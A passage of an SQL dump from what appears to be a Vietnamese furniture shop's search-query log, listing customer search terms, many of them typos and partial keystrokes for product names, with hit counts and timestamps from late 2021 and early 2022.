romantique',0,3,NULL,9,1,1,0,'2021-12-13 02:40:45'),(14692,'bàn làm việc kếy',284,1,NULL,9,1,1,0,'2021-12-13 10:42:28'),(14694,'bàn làm việc keesy=',284,1,NULL,9,1,1,0,'2021-12-13 10:42:29'),(14696,'bàn làm việc k',284,1,NULL,9,1,1,0,'2021-12-13 10:42:30'),(14698,'bàn làm việc kết hư',306,1,NULL,9,1,1,0,'2021-12-13 10:42:32'),(14700,'bàn làm việc kết h',317,1,NULL,9,1,1,0,'2021-12-13 10:42:35'),(14702,'bàn làm việc kết hợp bàn phấn',374,3,NULL,9,1,1,0,'2021-12-13 10:42:52'),(14708,'chauak',0,1,NULL,9,1,1,0,'2021-12-15 07:36:18'),(14710,'cha',0,2,NULL,9,1,1,0,'2021-12-15 07:36:19'),(14714,'chậu',23,7,NULL,9,1,1,0,'2021-12-18 13:30:54'),(14716,'chậu rửa',36,9,NULL,9,1,1,0,'2021-12-27 03:22:16'),(14734,'ru9',2,7,NULL,9,1,1,0,'2022-01-06 09:15:49'),(14745,'Vòi bếp',62,5,NULL,9,1,1,0,'2021-12-15 09:58:31'),(14756,'Chậu đá',56,10,NULL,9,1,1,0,'2021-12-15 10:01:46'),(14788,'سعثهتا',0,1,NULL,9,1,1,0,'2021-12-15 13:47:29'),(14790,'tab morelia',6,2,NULL,9,1,1,0,'2021-12-16 09:26:43'),(14805,'bàn làm việ',270,1,NULL,9,1,1,0,'2021-12-16 09:57:19'),(14807,'hộc bàn',154,1,NULL,9,1,1,0,'2021-12-16 09:57:22'),(14809,'hộc bàn Đ',154,1,NULL,9,1,1,0,'2021-12-16 09:57:23'),(14811,'hộc bàn DD',154,1,NULL,9,1,1,0,'2021-12-16 09:57:25'),(14814,'hộc bDD',32,1,NULL,9,1,1,0,'2021-12-16 09:57:55'),(14816,'hộc DD',34,6,NULL,9,1,1,0,'2021-12-16 10:09:52'),(14822,'ộc DD',2,1,NULL,9,1,1,0,'2021-12-16 09:58:34'),(14826,'Giường The Bag Ghi',23,1,NULL,9,1,1,0,'2021-12-16 09:59:05'),(14829,'Giường Koco',9,1,NULL,9,1,1,0,'2021-12-16 09:59:52'),(14834,'tủ tyoe',66,1,NULL,9,1,1,0,'2021-12-16 10:00:43'),(14836,'tủ ty',69,1,NULL,9,1,1,0,'2021-12-16 10:00:44'),(14838,'tủ typw',66,1,NULL,9,1,1,0,'2021-12-16 10:00:45'),(14840,'tủ typ',66,1,NULL,9,1,1,0,'2021-12-16 10:00:45'),(14842,'tủ type D',103,5,NULL,9,1,1,0,'2021-12-16 10:11:37'),(14845,'Tủ áo Type C màu ghi trắng (The Box)',279,1,NULL,9,1,1,0,'2021-12-16 10:01:28'),(14849,'Tủ áo Type C màu ghi trắn (The Box)',233,1,NULL,9,1,1,0,'2021-12-16 10:02:22'),(14851,'Tủ áo Type C màu g (The Box)',254,1,NULL,9,1,1,0,'2021-12-16 10:02:23'),(14853,'Tủ áo Type C màu gỗ be (The Box)',295,1,NULL,9,1,1,0,'2021-12-16 10:02:25'),(14856,'Brooklyn Bookcase',5,2,NULL,9,1,1,0,'2021-12-16 10:13:35'),(14859,'Champagne BookCase',3,1,NULL,9,1,1,0,'2021-12-16 10:03:34'),(14862,'Roltp TV stand',1,1,NULL,9,1,1,0,'2021-12-16 10:04:04'),(14865,'Brooklyn TV Stand',5,2,NULL,9,1,1,0,'2021-12-16 10:04:25'),(14870,'Champagne TV Stand 1',124,1,NULL,9,1,1,0,'2021-12-16 10:05:05'),(14873,'LIVANT tv STAND',1,1,NULL,9,1,1,0,'2021-12-16 10:05:48'),(14876,'AMI tvSTAND',1,1,NULL,9,1,1,0,'2021-12-16 10:06:24'),(14879,'Brooklyn Console 2',61,2,NULL,9,1,1,0,'2021-12-18 01:58:06'),(14882,'Brooklyn Console',7,3,NULL,9,1,1,0,'2021-12-18 01:58:51'),(14884,'Brooklyn Console 3',116,1,NULL,9,1,1,0,'2021-12-16 10:07:14'),(14886,'Champagne Console',6,1,NULL,9,1,1,0,'2021-12-16 10:07:28'),(14889,'Brooklyn Coffee Table',8,1,NULL,9,1,1,0,'2021-12-16 10:07:54'),(14892,'Bruno Shoe Cabinet',1,1,NULL,9,1,1,0,'2021-12-16 10:08:27'),(14909,'Tủ áo Type C màu gỗ be',295,1,NULL,9,1,1,0,'2021-12-16 10:11:58'),(14916,'bruno',1,1,NULL,9,1,1,0,'2021-12-16 10:22:44'),(14919,'tab',6,2,NULL,9,1,1,0,'2021-12-28 09:47:40'),(14921,'HĐ',0,1,NULL,9,1,1,0,'2021-12-16 10:30:49'),(14923,'HĐD',0,1,NULL,9,1,1,0,'2021-12-16 10:30:51'),(14925,'HDD',1,1,NULL,9,1,1,0,'2021-12-16 10:30:53'),(14928,'bàn trang điểm',234,22,NULL,9,1,1,0,'2022-01-03 09:11:56'),(14934,'bàn phấn',145,6,NULL,9,1,1,0,'2022-01-03 09:11:48'),(14940,'phấn',1,2,NULL,9,1,1,0,'2021-12-16 11:00:48'),(14988,'Kê ti vi',12,1,NULL,9,1,1,0,'2021-12-16 12:59:17'),(14991,'ghế ăn',391,43,NULL,9,1,1,0,'2022-01-08 17:39:46'),(14999,'ghees',0,1,NULL,9,1,1,0,'2021-12-16 13:12:46'),(15001,'ghế zai',343,1,NULL,9,1,1,0,'2021-12-16 13:12:48'),(15003,'ghế z',343,1,NULL,9,1,1,0,'2021-12-16 13:12:49'),(15005,'ghế ka',343,1,NULL,9,1,1,0,'2021-12-16 13:12:51'),(15007,'ghế kai',343,2,NULL,9,1,1,0,'2021-12-16 13:12:53'),(15013,'bàn ăn',159,70,NULL,9,1,1,0,'2022-01-08 17:38:28'),(15044,'Bàn Ăn Grace',147,2,NULL,9,1,1,0,'2021-12-18 14:31:00'),(15084,'mango',3,1,NULL,9,1,1,0,'2021-12-17 02:57:43'),(15111,'basic',9,3,NULL,9,1,1,0,'2021-12-19 06:22:02'),(15113,'basic 1',128,2,NULL,9,1,1,0,'2021-12-17 04:36:08'),(15123,'suny',1,3,NULL,9,1,1,0,'2021-12-28 07:16:15'),(15154,'prima',1,3,NULL,9,1,1,0,'2021-12-17 09:01:30'),(15159,'primaư',0,1,NULL,9,1,1,0,'2021-12-17 08:50:46'),(15163,'auro',0,1,NULL,9,1,1,0,'2021-12-17 08:51:08'),(15165,'aurora',1,2,NULL,9,1,1,0,'2021-12-17 08:51:10'),(15169,'auror',0,1,NULL,9,1,1,0,'2021-12-17 08:52:00'),(15171,'rey',0,1,NULL,9,1,1,0,'2021-12-17 08:52:01'),(15173,'reysona',0,2,NULL,9,1,1,0,'2021-12-17 08:52:04'),(15177,'reyn',0,1,NULL,9,1,1,0,'2021-12-17 08:52:21'),(15179,'reynóa',0,1,NULL,9,1,1,0,'2021-12-17 08:52:22'),(15181,'reynosa',1,2,NULL,9,1,1,0,'2021-12-17 08:52:23'),(15185,'reynos',0,1,NULL,9,1,1,0,'2021-12-17 08:55:00'),(15187,'duran',0,2,NULL,9,1,1,0,'2021-12-17 08:55:16'),(15189,'duranro',0,2,NULL,9,1,1,0,'2021-12-17 08:55:04'),(15195,'durango',1,3,NULL,9,1,1,0,'2021-12-25 01:43:28'),(15199,'celay',1,1,NULL,9,1,1,0,'2021-12-17 08:56:58'),(15202,'more',0,4,NULL,9,1,1,0,'2021-12-17 09:13:15'),(15204,'morelia',1,7,NULL,9,1,1,0,'2021-12-27 10:36:16'),(15208,'kings',3,3,NULL,9,1,1,0,'2022-01-03 09:35:23'),(15210,'kingsflied',1,2,NULL,9,1,1,0,'2021-12-17 09:08:13'),(15213,'kingsflie',1,1,NULL,9,1,1,0,'2021-12-17 09:00:30'),(15223,'ca',15,1,NULL,9,1,1,0,'2021-12-17 09:02:16'),(15225,'câtnia',0,2,NULL,9,1,1,0,'2021-12-17 09:02:18'),(15229,'câtni',0,1,NULL,9,1,1,0,'2021-12-17 09:02:22'),(15231,'cata',0,1,NULL,9,1,1,0,'2021-12-17 09:02:25'),(15233,'catania',10,1,NULL,9,1,1,0,'2021-12-17 09:02:26'),(15236,'sunny',0,2,NULL,9,1,1,0,'2021-12-17 09:04:32'),(15240,'dais',3,1,NULL,9,1,1,0,'2021-12-17 09:05:07'),(15242,'daisy',1,2,NULL,9,1,1,0,'2021-12-17 09:05:08'),(15246,'marble',1,4,NULL,9,1,1,0,'2021-12-27 02:52:55'),(15249,'leon',1,1,NULL,9,1,1,0,'2021-12-17 09:06:43'),(15257,'kin',0,1,NULL,9,1,1,0,'2021-12-17 09:08:10'),(15273,'bàn làm việc basic 1',344,2,NULL,9,1,1,0,'2021-12-18 01:54:52'),(15278,'soffa',0,1,NULL,9,1,1,0,'2021-12-18 01:56:52'),(15283,'brul',0,1,NULL,9,1,1,0,'2021-12-18 01:57:39'),(15285,'bruly',0,1,NULL,9,1,1,0,'2021-12-18 01:57:39'),(15287,'bru',0,1,NULL,9,1,1,0,'2021-12-18 01:57:41'),(15289,'bruklyn',0,1,NULL,9,1,1,0,'2021-12-18 01:57:43'),(15291,'brklyn',0,1,NULL,9,1,1,0,'2021-12-18 01:57:59'),(15293,'brôklyn',0,1,NULL,9,1,1,0,'2021-12-18 01:58:00'),(15295,'brooklyn',5,3,NULL,9,1,1,0,'2021-12-19 06:01:49'),(15297,'brooklyn cons',18,2,NULL,9,1,1,0,'2021-12-18 01:58:50'),(15303,'brooo',0,1,NULL,9,1,1,0,'2021-12-18 01:58:44'),(15305,'brookl',0,2,NULL,9,1,1,0,'2021-12-19 06:01:47'),(15307,'brooklyn cp',5,1,NULL,9,1,1,0,'2021-12-18 01:58:47'),(15309,'brooklyn c',8,1,NULL,9,1,1,0,'2021-12-18 01:58:48'),(15311,'brooklyn cónl',5,1,NULL,9,1,1,0,'2021-12-18 01:58:49'),(15313,'brooklyn cón',5,1,NULL,9,1,1,0,'2021-12-18 01:58:49'),(15319,'brookly console',4,1,NULL,9,1,1,0,'2021-12-18 02:01:27'),(15321,'cham console',4,1,NULL,9,1,1,0,'2021-12-18 02:01:29'),(15323,'champane console',4,1,NULL,9,1,1,0,'2021-12-18 02:01:30'),(15325,'champange console',4,1,NULL,9,1,1,0,'2021-12-18 02:01:44'),(15334,'bfan ăn',46,2,NULL,9,1,1,0,'2021-12-18 12:41:31'),(15405,'chậu ru',23,2,NULL,9,1,1,0,'2021-12-18 13:30:28'),(15411,'chậu rửa ha',36,1,NULL,9,1,1,0,'2021-12-18 13:30:34'),(15413,'chậu rửa ha\\',36,1,NULL,9,1,1,0,'2021-12-18 13:30:36'),(15415,'ha',96,1,NULL,9,1,1,0,'2021-12-18 13:30:38'),(15417,'haff',0,1,NULL,9,1,1,0,'2021-12-18 13:30:44'),(15419,'haf',0,1,NULL,9,1,1,0,'2021-12-18 13:30:45'),(15427,'Häfele',95,3,NULL,9,1,1,0,'2022-01-07 09:42:17'),(15438,'giá gia',91,1,NULL,9,1,1,0,'2021-12-18 13:36:54'),(15440,'giá gia vị',152,1,NULL,9,1,1,0,'2021-12-18 13:36:55'),(15443,'giá bát',81,7,NULL,9,1,1,0,'2021-12-18 13:37:47'),(15458,'kệ gia vị',99,2,NULL,9,1,1,0,'2021-12-18 13:38:00'),(15509,'ghế ăn ne',378,1,NULL,9,1,1,0,'2021-12-18 14:41:39'),(15511,'ghế ăn neva',378,2,NULL,9,1,1,0,'2021-12-18 14:41:40'),(15544,'Bàn Ăn Concorde',147,2,NULL,9,1,1,0,'2021-12-19 10:19:05'),(15555,'tha',18,1,NULL,9,1,1,0,'2021-12-18 14:59:10'),(15557,'thảm',4,1,NULL,9,1,1,0,'2021-12-18 14:59:11'),(15565,'ghế neva',328,2,NULL,9,1,1,0,'2021-12-28 06:31:26'),(15570,'console',4,2,NULL,9,1,1,0,'2021-12-19 05:55:56'),(15574,'brppl',0,2,NULL,9,1,1,0,'2021-12-19 06:01:41'),(15578,'brôk',0,1,NULL,9,1,1,0,'2021-12-19 06:01:46'),(15586,'ke sá',6,1,NULL,9,1,1,0,'2021-12-19 06:05:33'),(15588,'lêk s',0,1,NULL,9,1,1,0,'2021-12-19 06:05:33'),(15590,'kệ sách',16,1,NULL,9,1,1,0,'2021-12-19 06:05:39'),(15592,'kệ sách basic',24,4,NULL,9,1,1,0,'2022-01-10 03:06:39'),(15619,'bàn ă',144,2,NULL,9,1,1,0,'2022-01-02 08:30:50'),(15635,'bàn ăn ma',147,2,NULL,9,1,1,0,'2021-12-19 10:26:04'),(15639,'bàn ăn mar',147,1,NULL,9,1,1,0,'2021-12-19 10:26:05'),(15641,'bàn ăn marb',147,1,NULL,9,1,1,0,'2021-12-19 10:26:08'),(15643,'bàn ăn marbl',147,1,NULL,9,1,1,0,'2021-12-19 10:26:09'),(15645,'bàn ăn marble',147,1,NULL,9,1,1,0,'2021-12-19 10:26:10'),(15700,'bg',0,1,NULL,9,1,1,0,'2021-12-19 10:34:00'),(15715,'BT8 - bàn trà cặp đôi',144,2,NULL,9,1,1,0,'2022-01-06 11:17:17'),(15717,'giuo',0,2,NULL,9,1,1,0,'2021-12-19 12:16:20'),(15719,'giươg',0,1,NULL,9,1,1,0,'2021-12-19 12:16:19'),(15733,'BÀN LÀM VIỆC BASCIS',284,1,NULL,9,1,1,0,'2021-12-20 03:21:27'),(15735,'BÀN LÀM VIỆC BASCI',284,1,NULL,9,1,1,0,'2021-12-20 03:21:28'),(15737,'basic 3',118,2,NULL,9,1,1,0,'2021-12-20 03:29:28'),(15741,'govi',0,3,NULL,9,1,1,0,'2021-12-20 07:42:51'),(15747,'ty',5,1,NULL,9,1,1,0,'2021-12-20 08:12:07'),(15749,'type',3,1,NULL,9,1,1,0,'2021-12-20 08:12:08'),(15751,'typed',3,1,NULL,9,1,1,0,'2021-12-20 08:12:08'),(15754,'Ga',4,1,NULL,9,1,1,0,'2021-12-20 08:12:11'),(15756,'Gay',0,2,NULL,9,1,1,0,'2021-12-20 08:12:15'),(15760,'Gay se',0,1,NULL,9,1,1,0,'2021-12-20 08:12:17'),(15762,'Gay sexxxx',0,2,NULL,9,1,1,0,'2021-12-20 08:12:24'),(15794,'sòa',0,9,NULL,9,1,1,0,'2022-01-03 09:57:21'),(15927,'kệ tivi',15,3,NULL,9,1,1,0,'2021-12-30 06:49:08'),(15965,'union',37,1,NULL,9,1,1,0,'2021-12-23 02:27:15'),(15967,'3-2mv',128,2,NULL,9,1,1,0,'2021-12-23 02:59:28'),(15997,'ghế thư giãn',327,2,NULL,9,1,1,0,'2021-12-24 04:21:16'),(16003,'ghế lười',325,2,NULL,9,1,1,0,'2021-12-24 04:21:38'),(16014,'Bàn giám đốc',118,4,NULL,9,1,1,0,'2021-12-24 11:46:22'),(16026,'dủ',0,1,NULL,9,1,1,0,'2021-12-25 01:43:26'),(16031,'luna',0,1,NULL,9,1,1,0,'2021-12-25 02:21:31'),(16033,'run',0,1,NULL,9,1,1,0,'2021-12-25 02:21:33'),(16039,'giường tủ',70,1,NULL,9,1,1,0,'2021-12-25 08:38:21'),(16091,'Chăn',0,1,NULL,9,1,1,0,'2021-12-27 03:22:52'),(16093,'Chănj cửa',15,1,NULL,9,1,1,0,'2021-12-27 03:22:54'),(16095,'Chặn  cửa',15,1,NULL,9,1,1,0,'2021-12-27 03:23:00'),(16097,'Chặn cửa',217,3,NULL,9,1,1,0,'2021-12-27 03:23:19'),(16106,'Vi',31,1,NULL,9,1,1,0,'2021-12-27 04:17:10'),(16115,'hafeler',95,2,NULL,9,1,1,0,'2021-12-27 04:39:37'),(16122,'side',2,5,NULL,9,1,1,0,'2022-01-06 10:21:53'),(16126,'side t',2,2,NULL,9,1,1,0,'2021-12-27 04:47:01'),(16128,'side table',3,4,NULL,9,1,1,0,'2022-01-03 06:44:40'),(16132,'size table',11,3,NULL,9,1,1,0,'2022-01-03 06:44:31'),(16145,'side tab',6,2,NULL,9,1,1,0,'2021-12-27 04:47:24'),(16151,'ghế ar',270,1,NULL,9,1,1,0,'2021-12-27 04:50:03'),(16153,'ghế arm',270,2,NULL,9,1,1,0,'2021-12-27 04:50:06'),(16157,'ghế armc',270,1,NULL,9,1,1,0,'2021-12-27 04:50:23'),(16159,'ghế armch',270,1,NULL,9,1,1,0,'2021-12-27 04:50:24'),(16161,'ghế armchải',270,2,NULL,9,1,1,0,'2021-12-27 04:50:26'),(16165,'ghế armcharm',270,2,NULL,9,1,1,0,'2021-12-27 04:50:33'),(16169,'Foresthome',123,10,NULL,9,1,1,0,'2022-01-07 14:39:55'),(16173,'GHÊ ARMCHAIR',0,2,NULL,9,1,1,0,'2021-12-27 04:51:55'),(16177,'ghế armchair',20,2,NULL,9,1,1,0,'2021-12-27 04:52:04'),(16181,'ghế',20,3,NULL,9,1,1,0,'2021-12-27 04:52:30'),(16215,'airm',0,1,NULL,9,1,1,0,'2021-12-27 04:54:47'),(16217,'air',0,1,NULL,9,1,1,0,'2021-12-27 04:54:50'),(16219,'aircham',0,1,NULL,9,1,1,0,'2021-12-27 04:54:52'),(16221,'arrm',0,1,NULL,9,1,1,0,'2021-12-27 04:54:59'),(16223,'arm',0,1,NULL,9,1,1,0,'2021-12-27 04:55:00'),(16225,'armc',0,1,NULL,9,1,1,0,'2021-12-27 04:55:01'),(16227,'armchair',0,2,NULL,9,1,1,0,'2021-12-27 04:55:08'),(16233,'fore',0,1,NULL,9,1,1,0,'2021-12-27 04:56:25'),(16235,'fores',0,3,NULL,9,1,1,0,'2022-01-03 08:54:25'),(16237,'forest',123,5,NULL,9,1,1,0,'2022-01-07 10:28:20'),(16241,'home',1,2,NULL,9,1,1,0,'2021-12-27 04:56:31'),(16271,'ghế so',270,1,NULL,9,1,1,0,'2021-12-27 05:13:39'),(16273,'ghế sofa',348,6,NULL,9,1,1,0,'2022-01-06 10:18:59'),(16279,'CH1913',0,3,NULL,9,1,1,0,'2021-12-30 04:20:00'),(16284,'bàn c',51,1,NULL,9,1,1,0,'2021-12-27 05:15:25'),(16286,'bàn coof',48,1,NULL,9,1,1,0,'2021-12-27 05:15:26'),(16288,'bàn co',52,1,NULL,9,1,1,0,'2021-12-27 05:15:27'),(16290,'bàn coff',48,1,NULL,9,1,1,0,'2021-12-27 05:15:28'),(16292,'bàn coffee',48,2,NULL,9,1,1,0,'2021-12-27 05:15:31'),(16296,'phê',0,2,NULL,9,1,1,0,'2021-12-27 06:38:05'),(16358,'tivi',8,2,NULL,9,1,1,0,'2021-12-27 06:49:39'),(16364,'tủ quần á',66,1,NULL,9,1,1,0,'2021-12-27 06:49:58'),(16366,'tủ quần áo',69,10,NULL,9,1,1,0,'2021-12-30 03:32:30'),(16374,'de',0,1,NULL,9,1,1,0,'2021-12-27 06:53:18'),(16376,'decor',0,2,NULL,9,1,1,0,'2021-12-27 06:53:19'),(16380,'ghế phòng ngủ',316,2,NULL,9,1,1,0,'2021-12-27 06:53:31'),(16391,'GH',7,1,NULL,9,1,1,0,'2021-12-27 08:08:33'),(16407,'535.43.731',0,2,NULL,9,1,1,0,'2021-12-27 08:58:59'),(16411,'ấm đun nước',85,2,NULL,9,1,1,0,'2021-12-27 08:59:21'),(16422,'bàn ăn chân sắt',382,8,NULL,9,1,1,0,'2022-01-03 10:11:03'),(16469,'neva',1,3,NULL,9,1,1,0,'2022-01-08 02:52:05'),(16473,'TBT.S26',0,2,NULL,9,1,1,0,'2021-12-28 08:01:34'),(16479,'tủ bêp',82,3,NULL,9,1,1,0,'2022-01-07 02:52:55'),(16484,'tủ bếp tân cổ',90,4,NULL,9,1,1,0,'2021-12-28 08:03:47'),(16492,'vách',0,1,NULL,9,1,1,0,'2021-12-28 08:08:05'),(16494,'vacc',0,1,NULL,9,1,1,0,'2021-12-28 08:11:01'),(16496,'vac',0,2,NULL,9,1,1,0,'2021-12-28 08:11:03'),(16500,'vách ốp đầu giơ',66,1,NULL,9,1,1,0,'2021-12-28 08:11:07'),(16502,'vách ốp đầu giường',70,2,NULL,9,1,1,0,'2021-12-28 08:11:10'),(16506,'vành ốp đầu giường',74,2,NULL,9,1,1,0,'2021-12-28 08:11:22'),(16508,'vành ốp đầu gương',85,1,NULL,9,1,1,0,'2021-12-28 08:11:16'),(16512,'TỦ ÁO CÁNH KÍNH',117,1,NULL,9,1,1,0,'2021-12-28 08:12:25'),(16514,'tut',0,1,NULL,9,1,1,0,'2021-12-28 08:13:37'),(16519,'tab đầu',60,1,NULL,9,1,1,0,'2021-12-28 08:15:30'),(16521,'tab đầu g',90,1,NULL,9,1,1,0,'2021-12-28 08:15:35'),(16523,'tab đầu gi',60,1,NULL,9,1,1,0,'2021-12-28 08:15:39'),(16525,'tab đầu giường',64,3,NULL,9,1,1,0,'2021-12-28 08:16:00'),(16531,'tủ áo',69,6,NULL,9,1,1,0,'2022-01-06 06:56:22'),(16544,'tab trang trí',145,1,NULL,9,1,1,0,'2021-12-28 09:47:42'),(16546,'tag trang trí',140,2,NULL,9,1,1,0,'2021-12-28 09:47:51'),(16552,'tủ qua',117,1,NULL,9,1,1,0,'2021-12-28 10:29:36'),(16585,'HL-MW-30E YX-A3',0,2,NULL,9,1,1,0,'2021-12-30 04:06:06'),(16597,'ch191',0,1,NULL,9,1,1,0,'2021-12-30 04:19:59'),(16604,'sofa dd',23,1,NULL,9,1,1,0,'2021-12-30 05:37:15'),(16608,'sofa đ',21,1,NULL,9,1,1,0,'2021-12-30 05:37:16'),(16610,'sofa đơn bali',42,2,NULL,9,1,1,0,'2021-12-30 05:38:30'),(16616,'ga20',1,2,NULL,9,1,1,0,'2022-01-05 08:30:48'),(16772,'bàn ăn chân s',375,1,NULL,9,1,1,0,'2022-01-02 12:09:50'),(16781,'HAFELE_495.61.120',1,2,NULL,9,1,1,0,'2022-01-03 03:44:04'),(16796,'bàn đôi',144,4,NULL,9,1,1,0,'2022-01-03 06:38:49'),(16815,'size',8,1,NULL,9,1,1,0,'2022-01-03 06:44:28'),(16817,'size tab',14,1,NULL,9,1,1,0,'2022-01-03 06:44:30'),(16824,'E18100',0,2,NULL,9,1,1,0,'2022-01-03 06:52:06'),(16828,'BT',17,4,NULL,9,1,1,0,'2022-01-06 11:23:15'),(16830,'BT 3',104,1,NULL,9,1,1,0,'2022-01-03 07:04:28'),(16832,'BT 38',5,2,NULL,9,1,1,0,'2022-01-03 07:04:29'),(16838,'bt38',1,4,NULL,9,1,1,0,'2022-01-03 07:30:20'),(16840,'bt37',1,2,NULL,9,1,1,0,'2022-01-03 07:04:54'),(16845,'bt3',1,1,NULL,9,1,1,0,'2022-01-03 07:06:37'),(16851,'grad',0,1,NULL,9,1,1,0,'2022-01-03 07:18:04'),(16882,'pvd',12,2,NULL,9,1,1,0,'2022-01-03 07:30:13'),(16886,'pvd38',0,1,NULL,9,1,1,0,'2022-01-03 07:30:15'),(16894,'G6-CT',1,1,NULL,9,1,1,0,'2022-01-03 07:31:52'),(16896,'G6',0,1,NULL,9,1,1,0,'2022-01-03 07:31:56'),(16898,'mon',0,4,NULL,9,1,1,0,'2022-01-06 10:24:05'),(16900,'monet',2,2,NULL,9,1,1,0,'2022-01-03 09:43:46'),(16902,'hm',4,1,NULL,9,1,1,0,'2022-01-03 07:40:26'),(16904,'hm10',1,9,NULL,9,1,1,0,'2022-01-06 11:29:52'),(16906,'wis',0,4,NULL,9,1,1,0,'2022-01-06 10:25:12'),(16908,'wi',3,3,NULL,9,1,1,0,'2022-01-06 10:25:11'),(16912,'wisbon',0,4,NULL,9,1,1,0,'2022-01-03 10:16:20'),(16918,'wissb',0,1,NULL,9,1,1,0,'2022-01-03 07:41:51'),(16922,'wishbon',1,2,NULL,9,1,1,0,'2022-01-03 07:41:53'),(16928,'ba17',1,2,NULL,9,1,1,0,'2022-01-03 08:09:33'),(16932,'nỏdic',0,2,NULL,9,1,1,0,'2022-01-03 08:53:38'),(16936,'nỏdi',0,1,NULL,9,1,1,0,'2022-01-03 08:53:43'),(16938,'nordic',5,2,NULL,9,1,1,0,'2022-01-03 08:53:46'),(16942,'fors',0,1,NULL,9,1,1,0,'2022-01-03 08:54:23'),(16948,'forestho,me',8,1,NULL,9,1,1,0,'2022-01-03 08:54:26'),(16950,'forestho',0,1,NULL,9,1,1,0,'2022-01-03 08:54:27'),(16954,'foresth',0,1,NULL,9,1,1,0,'2022-01-03 08:54:31'),(16956,'g21',0,2,NULL,9,1,1,0,'2022-01-03 10:16:06'),(16959,'620',0,1,NULL,9,1,1,0,'2022-01-03 09:11:21'),(16961,'620wwn',0,2,NULL,9,1,1,0,'2022-01-03 09:11:22'),(16965,'620wn',0,2,NULL,9,1,1,0,'2022-01-03 09:11:27'),(16982,'king',2,2,NULL,9,1,1,0,'2022-01-03 09:35:14'),(16992,'tủ giầy bruno',69,2,NULL,9,1,1,0,'2022-01-03 09:37:53'),(17008,'ba16',1,2,NULL,9,1,1,0,'2022-01-03 09:43:23'),(17032,'warm light',0,2,NULL,9,1,1,0,'2022-01-03 10:05:28'),(17036,'ED1 001',0,2,NULL,9,1,1,0,'2022-01-03 10:05:56'),(17040,'ed1 01',4,1,NULL,9,1,1,0,'2022-01-03 10:05:59'),(17058,'tu sach',26,2,NULL,9,1,1,0,'2022-01-03 10:15:38'),(17075,'a',245,1,NULL,9,1,1,0,'2022-01-04 06:45:26'),(17079,'Flexfit rental',52,1,NULL,9,1,1,0,'2022-01-04 11:19:42'),(17081,'Furniture/Sản phẩm/NỘI THẤT ĐỒ RỜI/HOME/Phòng Khách/Bàn trà',499,2,NULL,9,1,1,0,'2022-01-05 01:47:50'),(17092,'BT17',1,3,NULL,9,1,1,0,'2022-01-06 09:14:28'),(17104,'sofa đơn',43,1,NULL,9,1,1,0,'2022-01-05 08:36:27'),(17106,'tủ áo tân cổ',77,4,NULL,9,1,1,0,'2022-01-06 03:36:04'),(17116,'tủ áo walkin',69,2,NULL,9,1,1,0,'2022-01-06 06:56:32'),(17120,'ba20',0,1,NULL,9,1,1,0,'2022-01-06 08:37:50'),(17122,'BT1',6,5,NULL,9,1,1,0,'2022-01-06 09:27:29'),(17132,'SD3',1,2,NULL,9,1,1,0,'2022-01-06 09:10:24'),(17142,'DTH001',1,8,NULL,9,1,1,0,'2022-01-06 09:25:44'),(17146,'DTH001DTH001',0,1,NULL,9,1,1,0,'2022-01-06 09:21:08'),(17152,'dth 001',0,1,NULL,9,1,1,0,'2022-01-06 09:21:40'),(17158,'dth',0,1,NULL,9,1,1,0,'2022-01-06 09:24:03'),(17162,'DTH002',0,6,NULL,9,1,1,0,'2022-01-06 09:26:12'),(17180,'EA10',0,7,NULL,9,1,1,0,'2022-01-06 17:27:46'),(17182,'ea',14,1,NULL,9,1,1,0,'2022-01-06 09:28:30'),(17186,'THAM017',1,2,NULL,9,1,1,0,'2022-01-06 09:29:09'),(17190,'THAM008',1,2,NULL,9,1,1,0,'2022-01-06 09:29:56'),(17195,'DTH005',0,2,NULL,9,1,1,0,'2022-01-06 09:31:10'),(17199,'HM7',1,8,NULL,9,1,1,0,'2022-01-06 11:33:27'),(17203,'EA18',0,3,NULL,9,1,1,0,'2022-01-06 09:33:51'),(17209,'EA3',0,3,NULL,9,1,1,0,'2022-01-06 10:58:29'),(17228,'mo',5,3,NULL,9,1,1,0,'2022-01-06 10:24:06'),(17239,'wib',0,1,NULL,9,1,1,0,'2022-01-06 10:25:09'),(17251,'bt8',0,10,NULL,9,1,1,0,'2022-01-07 15:12:41'),(17263,'bt8]',0,2,NULL,9,1,1,0,'2022-01-06 11:19:30'),(17277,'hs19',3,1,NULL,9,1,1,0,'2022-01-06 11:21:59'),(17279,'ez10',0,2,NULL,9,1,1,0,'2022-01-06 11:22:10'),(17286,'ba2',1,3,NULL,9,1,1,0,'2022-01-07 10:41:15'),(17292,'bt 8\\',15,2,NULL,9,1,1,0,'2022-01-06 11:23:16'),(17296,'bt 8',15,2,NULL,9,1,1,0,'2022-01-06 11:23:17'),(17319,'bt18',1,2,NULL,9,1,1,0,'2022-01-06 11:30:30'),(17323,'345',0,2,NULL,9,1,1,0,'2022-01-06 11:30:37'),(17337,'hm7\\',1,1,NULL,9,1,1,0,'2022-01-06 11:33:26'),(17342,'ba',15,5,NULL,9,1,1,0,'2022-01-07 16:10:15'),(17343,'ba3',1,4,NULL,9,1,1,0,'2022-01-07 14:41:13'),(17345,'ba10',1,22,NULL,9,1,1,0,'2022-01-10 02:19:30'),(17360,'bàn trà bt17',144,2,NULL,9,1,1,0,'2022-01-07 01:27:30'),(17375,'marbel',0,1,NULL,9,1,1,0,'2022-01-07 04:50:46'),(17388,'voi tron',23,2,NULL,9,1,1,0,'2022-01-07 09:40:10'),(17396,'bt16',1,2,NULL,9,1,1,0,'2022-01-07 09:41:47'),(17401,'TS384',1,2,NULL,9,1,1,0,'2022-01-07 09:43:31'),(17420,'Lunar',1,1,NULL,9,1,1,0,'2022-01-07 10:28:16'),(17424,'FORESTHOME_BA10',1,2,NULL,9,1,1,0,'2022-01-07 10:28:36'),(17446,'BA4',1,3,NULL,9,1,1,0,'2022-01-07 15:12:27'),(17450,'BA5',1,1,NULL,9,1,1,0,'2022-01-07 10:41:35'),(17452,'BA6',1,23,NULL,9,1,1,0,'2022-01-07 15:07:25'),(17456,'Tulip',1,3,NULL,9,1,1,0,'2022-01-07 10:44:33'),(17485,'bao',11,1,NULL,9,1,1,0,'2022-01-07 14:33:27'),(17495,'FORESTHOME_BA6',1,4,NULL,9,1,1,0,'2022-01-07 14:39:10'),(17501,'_BA6',0,1,NULL,9,1,1,0,'2022-01-07 14:39:04'),(17524,'BA1',1,1,NULL,9,1,1,0,'2022-01-07 14:40:18'),(17538,'BA61',0,1,NULL,9,1,1,0,'2022-01-07 15:12:17'),(17548,'_BT8',0,4,NULL,9,1,1,0,'2022-01-07 15:15:11'),(17552,'-BT8',0,1,NULL,9,1,1,0,'2022-01-07 